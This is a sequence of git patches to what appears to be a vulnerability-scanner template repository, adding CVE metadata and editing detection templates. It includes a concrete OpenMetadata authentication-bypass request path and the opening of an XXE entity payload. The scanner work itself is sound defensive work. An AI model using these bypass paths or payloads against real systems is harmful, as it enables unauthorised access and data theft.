{"ID":"CVE-2024-27956","Info":{"Name":"WordPress Automatic Plugin \u003c= 3.92.0 - SQL Injection","Severity":"critical","Description":"The Automatic plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.92.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-27956.yaml"} {"ID":"CVE-2024-28255","Info":{"Name":"OpenMetadata - Authentication Bypass","Severity":"critical","Description":"OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. The `JwtFilter` handles the API authentication by requiring and verifying JWT tokens. When a new request comes in, the request's path is checked against this list. When the request's path contains any of the excluded endpoints the filter returns without validating the JWT. Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings. For example, a request to `GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/111` will match the excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the authentication mechanism and reach any arbitrary endpoint, including the ones listed above that lead to arbitrary SpEL expression injection. This bypass will not work when the endpoint uses the `SecurityContext.getUserPrincipal()` since it will return `null` and will throw an NPE. This issue may lead to authentication bypass and has been addressed in version 1.2.4. Users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as `GHSL-2023-237`.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-28255.yaml"} {"ID":"CVE-2024-28734","Info":{"Name":"Coda v.2024Q1 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in Unit4 Financials by Coda v.2024Q1 allows a remote attacker to escalate privileges via a crafted script to the cols parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-28734.yaml"} +{"ID":"CVE-2024-2876","Info":{"Name":"Wordpress Email Subscribers by Icegram Express - SQL Injection","Severity":"critical","Description":"The Email Subscribers by Icegram Express - Email Marketing, Newsletters, Automation for WordPress \u0026 WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-2876.yaml"} {"ID":"CVE-2024-2879","Info":{"Name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","Severity":"critical","Description":"The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-2879.yaml"} {"ID":"CVE-2024-29059","Info":{"Name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","Severity":"high","Description":".NET Framework Information Disclosure Vulnerability","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-29059.yaml"} {"ID":"CVE-2024-29269","Info":{"Name":"Telesquare TLR-2005KSH - Remote Command Execution","Severity":"critical","Description":"Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-29269.yaml"} +{"ID":"CVE-2024-3136","Info":{"Name":"MasterStudy LMS \u003c= 3.3.3 - Unauthenticated Local File Inclusion via template","Severity":"critical","Description":"The MasterStudy LMS plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'template' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \"safe\" file types can be uploaded and included.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3136.yaml"} {"ID":"CVE-2024-31621","Info":{"Name":"Flowise 1.6.5 - Authentication Bypass","Severity":"high","Description":"The flowise version \u003c= 1.6.5 is vulnerable to authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-31621.yaml"} {"ID":"CVE-2024-31849","Info":{"Name":"CData API Server \u003c 23.4.8844 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData API Server \u003c 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31849.yaml"} {"ID":"CVE-2024-32399","Info":{"Name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","Severity":"high","Description":"Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32399.yaml"} {"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"high","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"} {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"} +{"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} {"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 59bba03b5a..6385089a27 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -9895478dd995b34657d5410bb4f56b5e +c29ef56ef3383c354d9b91b4b82b0f25 From bbf1befae6e709cd7a59eb12c26d57cdbcb49ccd Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 2 May 2024 18:32:19 +0000 Subject: [PATCH 0517/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index e7c81c7bdb..be0b53883f 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -17,6 +17,7 @@ on: - 'http/cves/2024/CVE-2024-23917.yaml' - 'http/cves/2024/CVE-2024-24131.yaml' - 'http/cves/2024/CVE-2024-27956.yaml' + - 'http/cves/2024/CVE-2024-2876.yaml' - 'http/cves/2024/CVE-2024-3136.yaml' - 'http/cves/2024/CVE-2024-31621.yaml' - 'http/cves/2024/CVE-2024-31849.yaml' From eadfc83ead08ad5a6939626778c23693a242b2e8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 3 May 2024 00:03:32 +0530 Subject: [PATCH 0518/1768] Update unauthenticated-jenkins.yaml --- http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml b/http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml index 8159ae07ac..3efba26d2e 100644 --- a/http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml +++ b/http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml @@ -1,7 +1,7 @@ id: unauthenticated-jenkins info: - name: Unauthenticated Jenkins Dashboard + name: Jenkins Dashboard - Unauthenticated Access author: dhiyaneshDK severity: high description: Jenkins Dashboard is exposed to external users. @@ -21,7 +21,6 @@ http: - type: word words: - Dashboard [Jenkins] - condition: and - type: status status: From 488616975d8546c81b406f9a4eddd42ef00f5c9c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 2 May 2024 18:33:36 +0000 Subject: [PATCH 0519/1768] Auto Template Signing [Thu May 2 18:33:36 UTC 2024] :robot: --- http/cves/2024/CVE-2024-2876.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-2876.yaml b/http/cves/2024/CVE-2024-2876.yaml index e306e5552d..2f877347a2 100644 --- a/http/cves/2024/CVE-2024-2876.yaml +++ b/http/cves/2024/CVE-2024-2876.yaml @@ -33,3 +33,4 @@ http: - 'contains(header, "application/json")' - 'contains_all(body, "bulk_action", "_sent", "errortype")' condition: and +# digest: 4a0a00473045022100817fb9b3e4ea49e7dbe5e57d8b5e04f4325b5d104def6e85aed38a448372bbe002207bd138ea4becb7377be2c0d77ca9bf30101280e1e917339800ad3cc99954c2d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 6f01579e8b044dae95c88a0d3225b1eb55c5c911 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 2 May 2024 18:36:26 +0000 Subject: [PATCH 0521/1768] Auto Generated Templates Checksum [Thu May 2 18:36:26 UTC 2024] :robot: --- templates-checksum.txt | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0dbe2f6bf1..bc05b05296 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:a83b1d28d08a4db46d17d388bcf81c7e84e5d070 -cves.json-checksum.txt:ed3a389b3e1ad60c470636fdd258e185cc7b8a9b +cves.json:407b0f48544c06238f85e8a73da136535098657a +cves.json-checksum.txt:285336192b26f8a99ed08645277512703539c410 dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3255,7 +3255,7 @@ http/cves/2024/CVE-2024-27954.yaml:fe69ea721d3341747af165f3378e4f8bedb2ff43 http/cves/2024/CVE-2024-27956.yaml:6642a8487441523926a0828c54b333ba9737522f http/cves/2024/CVE-2024-28255.yaml:dd2f4a52d0d4f9af3c6a6fc10a917e99e8f0717d http/cves/2024/CVE-2024-28734.yaml:a21288b4f390a5aea56ed3660da93b8fed589096 -http/cves/2024/CVE-2024-2876.yaml:a790d7d69f388090aa36e39977fd33c0389df5db +http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b http/cves/2024/CVE-2024-2879.yaml:b49dbdd0903b4812334dfdb5d99c2c128b750841 http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc @@ -7499,7 +7499,7 @@ http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml:d2ccf2e6f610a31f1503ed30b074a http/vulnerabilities/jenkins/jenkins-asyncpeople.yaml:28dbb6ff09c477f85b9bb63b572ece60d1f6da94 http/vulnerabilities/jenkins/jenkins-script.yaml:d557e9f184eed10b1f1c9d2769ce17b9873bf47f http/vulnerabilities/jenkins/jenkins-stack-trace.yaml:7ebe9434bb86753e39e131e4e69d1f79b279179a -http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml:8f7dca1421c59002b78381ba8deffb603ab36d04 +http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml:e2a23ad010cccf8daa99271e513b040dc774fb90 http/vulnerabilities/jinhe/jinhe-jc6-sqli.yaml:5864d5ddbf7bb775957f9af2c354e278b135e888 http/vulnerabilities/jinhe/jinhe-oa-c6-lfi.yaml:ddb4e69fa2143bf694f57a117f26e02f9a0b3db5 http/vulnerabilities/jira/jira-servicedesk-signup.yaml:d3ad2f1c3e763757dfc43f44463017a99f5afed4 @@ -8464,7 +8464,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4203d3910bb642076ac29e4385a53d70695a51ef +templates-checksum.txt:465db5a1c190e3d2a9013cbf9d8ea06794949928 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ee7949a1ce6cebfebcfc89eb3d1eee99320f1b0e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 2 May 2024 18:38:10 +0000 Subject: [PATCH 0522/1768] Auto Template Signing [Thu May 2 18:38:10 UTC 2024] :robot: --- http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml b/http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml index 3efba26d2e..9f53263d37 100644 --- a/http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml +++ b/http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml @@ -25,4 +25,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cef11be2e4fc4d5fe925f91269917b5763805635e48d3ae6c5ead57dbe56d9e0022100e2b91fe6026d44a02b15e34655c58d3a95cb070db314386bbb568a1f1b05ace3:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202b26e420567b42984cf73e1432a2d97a046c3a65adce12505d6c7f15b8117a3702207727a946b018ec8d53a5d62b3cb34129cdd87d1d85d2fac1efa37332668197eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5c88c9f2f195bcb4eee8a9c4b62a3f67fb450f77 Mon Sep 17 00:00:00 2001 From: 0xTaylor <0xTaylor@chaosdao.org> Date: Thu, 2 May 2024 11:51:27 -0700 Subject: [PATCH 0523/1768] Fix regex matcher and extractor to match only rfc1918 addresses --- http/misconfiguration/internal-ip-disclosure.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/internal-ip-disclosure.yaml b/http/misconfiguration/internal-ip-disclosure.yaml index 20d7eea1bc..790bd2e7a6 100644 --- a/http/misconfiguration/internal-ip-disclosure.yaml +++ b/http/misconfiguration/internal-ip-disclosure.yaml @@ -29,7 +29,7 @@ http: - type: regex part: location regex: - - '([0-9]{1,3}[\.]){3}[0-9]{1,3}' + - '^(10(?:\.\d{1,3}){3}|192\.168(?:\.\d{1,3}){2}|172\.(?:1[6-9]|2\d|3[0-1])(?:\.\d{1,3}){2})$' - type: dsl dsl: @@ -44,6 +44,6 @@ http: - type: regex part: location regex: - - '([0-9]{1,3}[\.]){3}[0-9]{1,3}' + - '^(10(?:\.\d{1,3}){3}|192\.168(?:\.\d{1,3}){2}|172\.(?:1[6-9]|2\d|3[0-1])(?:\.\d{1,3}){2})$' # digest: 4a0a00473045022100be01acb985c09c3394bcce936ba1cc283802b1069e6fcc5f63196c772bd55f5a02207165d8ff2b202e511f03d2c75a241b2f933b85b3993f668651c3db8216243382:922c64590222798bb761d5b6d8e72950 From 859905b05f7132f7888a22235a6c106a23c04f70 Mon Sep 17 00:00:00 2001 From: lstatro Date: Thu, 2 May 2024 16:36:53 -0400 Subject: [PATCH 0524/1768] teamforge detection --- http/technologies/teamforge-detect.yaml | 47 +++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 http/technologies/teamforge-detect.yaml diff --git a/http/technologies/teamforge-detect.yaml b/http/technologies/teamforge-detect.yaml new file mode 100644 index 0000000000..c3badb0a52 --- /dev/null +++ b/http/technologies/teamforge-detect.yaml @@ -0,0 +1,47 @@ +id: teamforge-detect + +info: + name: TeamForge - Detection + author: lstatro + severity: info + description: | + Detects if the target is running a TeamForge server from digital.ai. + reference: + - https://digital.ai/products/teamforge/ + metadata: + # TeamForge changes the title based on lange, for example: + # TeamForge : 欢迎 + # TeamForge : Welcome + shodan-query: title:"TeamForge :" + fofa-query: title="TeamForge :" + tags: + - tech + - teamforge + +http: + - method: GET + path: + - "{{BaseURL}}" + redirects: true + max-redirects: 5 # base url always follows a redirect chain, normally it's but can be more 3 by default + matchers-condition: and + matchers: + - type: word + part: body + words: + - "TeamForge :" + - "Log In to TeamForge" + - 'href="http://www.collab.net/products/teamforge/" target="_blank">TeamForge' + condition: or + - type: status + status: + - 200 + extractors: + - type: regex + part: body + regex: + # the version is included in a help page link, for example + # version teamforge810 is teamforge version 8.1 and teamforge1711 + # is teamforge version 17.11 + - "teamforge(\\d+)" + name: version From 70cf75189832cb810d94223aa8f732e69574450f Mon Sep 17 00:00:00 2001 From: lstatro <jdhoffmeyer@gmail.com> Date: Thu, 2 May 2024 17:22:47 -0400 Subject: [PATCH 0525/1768] fix comment --- http/technologies/teamforge-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/teamforge-detect.yaml b/http/technologies/teamforge-detect.yaml index c3badb0a52..f7f4d7a8fe 100644 --- a/http/technologies/teamforge-detect.yaml +++ b/http/technologies/teamforge-detect.yaml @@ -23,7 +23,7 @@ http: path: - "{{BaseURL}}" redirects: true - max-redirects: 5 # base url always follows a redirect chain, normally it's but can be more 3 by default + max-redirects: 5 # base url always follows a redirect chain, normally it's 3, but can be more matchers-condition: and matchers: - type: word From feae60cf00d58719d59bb093eac79f21bc583492 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <daffa@spidersilk.com> Date: Fri, 3 May 2024 09:29:56 +0700 Subject: [PATCH 0526/1768] feat: removed kev tags --- http/cves/2022/CVE-2022-43769.yaml | 2 +- http/cves/2023/CVE-2023-25135.yaml | 2 +- http/cves/2023/CVE-2023-2825.yaml | 2 +- http/cves/2023/CVE-2023-3460.yaml | 2 +- http/cves/2024/CVE-2024-22024.yaml | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/http/cves/2022/CVE-2022-43769.yaml b/http/cves/2022/CVE-2022-43769.yaml index b51fa0f7e1..eaee0a0002 100644 --- a/http/cves/2022/CVE-2022-43769.yaml +++ b/http/cves/2022/CVE-2022-43769.yaml @@ -27,7 +27,7 @@ info: vendor: hitachi product: vantara_pentaho_business_analytics_server shodan-query: http.favicon.hash:1749354953 - tags: cve,cve2022,packetstorm,rce,ssti,pentaho,kev,hitachi + tags: cve,cve2022,packetstorm,rce,ssti,pentaho,hitachi http: - method: GET diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index e63de7c084..1cb6538233 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -30,7 +30,7 @@ info: product: vbulletin shodan-query: http.component:"vBulletin" google-query: intext:"Powered By vBulletin" - tags: cve2023,cve,vbulletin,rce,kev + tags: cve,cve2023,vbulletin,rce http: - raw: diff --git a/http/cves/2023/CVE-2023-2825.yaml b/http/cves/2023/CVE-2023-2825.yaml index 0031bfccae..36e8262102 100644 --- a/http/cves/2023/CVE-2023-2825.yaml +++ b/http/cves/2023/CVE-2023-2825.yaml @@ -28,7 +28,7 @@ info: vendor: gitlab product: gitlab shodan-query: title:"Gitlab" - tags: cve2023,cve,gitlab,lfi,kev,authenticated,intrusive + tags: cve2023,cve,gitlab,lfi,authenticated,intrusive variables: data: "{{rand_base(5)}}" diff --git a/http/cves/2023/CVE-2023-3460.yaml b/http/cves/2023/CVE-2023-3460.yaml index dca6f2e501..f14d64ceaf 100644 --- a/http/cves/2023/CVE-2023-3460.yaml +++ b/http/cves/2023/CVE-2023-3460.yaml @@ -32,7 +32,7 @@ info: framework: wordpress publicwww-query: /wp-content/plugins/ultimate-member google-query: inurl:/wp-content/plugins/ultimate-member - tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,kev,wpscan,ultimatemember + tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpscan,ultimatemember variables: username: "{{rand_base(6)}}" password: "{{rand_base(8)}}" diff --git a/http/cves/2024/CVE-2024-22024.yaml b/http/cves/2024/CVE-2024-22024.yaml index 7f6d843b3c..02ecbe0fcf 100644 --- a/http/cves/2024/CVE-2024-22024.yaml +++ b/http/cves/2024/CVE-2024-22024.yaml @@ -18,7 +18,7 @@ info: vendor: ivanti product: "connect_secure" shodan-query: "html:\"welcome.cgi?p=logo\"" - tags: cve,cve2024,kev,xxe,ivanti + tags: cve,cve2024,xxe,ivanti variables: payload: '<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM From 33a22d26a9b73103a6cf2e05260c4c69d8819e61 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 3 May 2024 11:09:48 +0530 Subject: [PATCH 0527/1768] format update --- http/cves/2023/CVE-2023-5003.yaml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/http/cves/2023/CVE-2023-5003.yaml b/http/cves/2023/CVE-2023-5003.yaml index 3bd92b33d8..296e6eb9cf 100644 --- a/http/cves/2023/CVE-2023-5003.yaml +++ b/http/cves/2023/CVE-2023-5003.yaml @@ -6,6 +6,7 @@ info: severity: high description: | The Active Directory Integration / LDAP Integration WordPress plugin before 4.1.10 stores sensitive LDAP logs in a buffer file when an administrator wants to export said logs. Unfortunately, this log file is never removed, and remains accessible to any users knowing the URL to do so. + remediation: Fixed in 4.1.10 reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-5003 - https://wpscan.com/vulnerability/91f4e500-71f3-4ef6-9cc7-24a7c12a5748/ @@ -14,12 +15,14 @@ info: cvss-score: 7.5 cve-id: CVE-2023-5003 epss-score: 0.00084 - epss-percentile: 0.35002 + epss-percentile: 0.35074 cpe: cpe:2.3:a:miniorange:active_directory_integration_\/_ldap_integration:*:*:*:*:*:wordpress:*:* metadata: vendor: miniorange product: active_directory_integration_\/_ldap_integration framework: wordpress + verified: true + max-request: 1 tags: wpscan,exposure,csv,ldap,cve2023,wordpress,wp-plugin http: @@ -29,13 +32,14 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: word words: - "ID" - "USERNAME" - "TIME" - "LDAP STATUS" - condition: and \ No newline at end of file + condition: and + + - type: status + status: + - 200 From ba77af45ceaebf9404d1e9775f400b3c0ca24c83 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 3 May 2024 11:11:13 +0530 Subject: [PATCH 0528/1768] minor update --- http/cves/2024/CVE-2024-32651.yaml | 17 +++++++++++++---- 1 file changed, 13 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-32651.yaml b/http/cves/2024/CVE-2024-32651.yaml index 46da0f5d44..f4a247ac3b 100644 --- a/http/cves/2024/CVE-2024-32651.yaml +++ b/http/cves/2024/CVE-2024-32651.yaml @@ -1,7 +1,7 @@ id: CVE-2024-32651 info: - name: changedetection.io - Server Side Template Injection + name: Change Detection - Server Side Template Injection author: edoardottt severity: critical description: | @@ -9,20 +9,29 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-32651 - https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-4r7v-whpg-8rx3 + - https://github.com/dgtlmoon/changedetection.io/releases/tag/0.45.21 + - https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2024-32651 cwe-id: CWE-1336 + epss-score: 0.00045 + epss-percentile: 0.14322 + metadata: + verified: true + max-request: 1 + shodan-query: html:"Change Detection" tags: cve,cve2024,changedetection,ssti,rce -requests: +http: - method: GET - redirects: true - max-redirects: 5 path: - "{{BaseURL}}/" + redirects: true + max-redirects: 2 + extractors: - type: xpath name: version From d9b22205a91d9b556d539fb2992af782617a626b Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Fri, 3 May 2024 05:48:27 +0000 Subject: [PATCH 0529/1768] Auto Generated New Template Addition List [Fri May 3 05:48:27 UTC 2024] :robot: --- .new-additions | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/.new-additions b/.new-additions index 8a3aa3df71..62fea9d767 100644 --- a/.new-additions +++ b/.new-additions @@ -1,11 +1,16 @@ +http/cves/2015/CVE-2015-4455.yaml +http/cves/2019/CVE-2019-7139.yaml http/cves/2023/CVE-2023-1892.yaml http/cves/2023/CVE-2023-2227.yaml +http/cves/2023/CVE-2023-27032.yaml http/cves/2023/CVE-2023-2948.yaml http/cves/2023/CVE-2023-2949.yaml http/cves/2023/CVE-2023-31446.yaml http/cves/2023/CVE-2023-32077.yaml http/cves/2023/CVE-2023-38964.yaml http/cves/2023/CVE-2023-43208.yaml +http/cves/2023/CVE-2023-45375.yaml +http/cves/2023/CVE-2023-46347.yaml http/cves/2023/CVE-2023-4973.yaml http/cves/2024/CVE-2024-0235.yaml http/cves/2024/CVE-2024-1183.yaml @@ -29,6 +34,8 @@ http/exposed-panels/tixeo-panel.yaml http/misconfiguration/installer/eyoucms-installer.yaml http/misconfiguration/installer/sabnzbd-installer.yaml http/misconfiguration/titannit-web-exposure.yaml +http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml http/vulnerabilities/titan/titannit-web-rce.yaml +http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml network/detection/aix-websm-detect.yaml network/detection/bluecoat-telnet-proxy-detect.yaml From 9cd5ee0d3028d40da4ce1faa1f4316bc51cdf303 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 3 May 2024 05:48:32 +0000 Subject: [PATCH 0530/1768] Auto Generated Templates Checksum [Fri May 3 05:48:32 UTC 2024] :robot: --- templates-checksum.txt | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index bc05b05296..433e944cf4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1183,6 +1183,7 @@ http/cves/2015/CVE-2015-4063.yaml:82f243448aa7204d9d610679fb10f817dbb54750 http/cves/2015/CVE-2015-4074.yaml:065fb740afd3068b6d1e46df88070d26b6ce45e0 http/cves/2015/CVE-2015-4127.yaml:544be4829bf72ee7d73cc4cb7f47f3fd3f1ae01c http/cves/2015/CVE-2015-4414.yaml:d62aaf0ccbf4332dd956ee3fa625dfef380e07cd +http/cves/2015/CVE-2015-4455.yaml:3ca9abe358652953c3b12c8468f92573676c4e95 http/cves/2015/CVE-2015-4632.yaml:d062862654959446af1cb7bdb1e5ff2ff029510e http/cves/2015/CVE-2015-4666.yaml:846d0baaf39e9f004c072d698ff122871460f68e 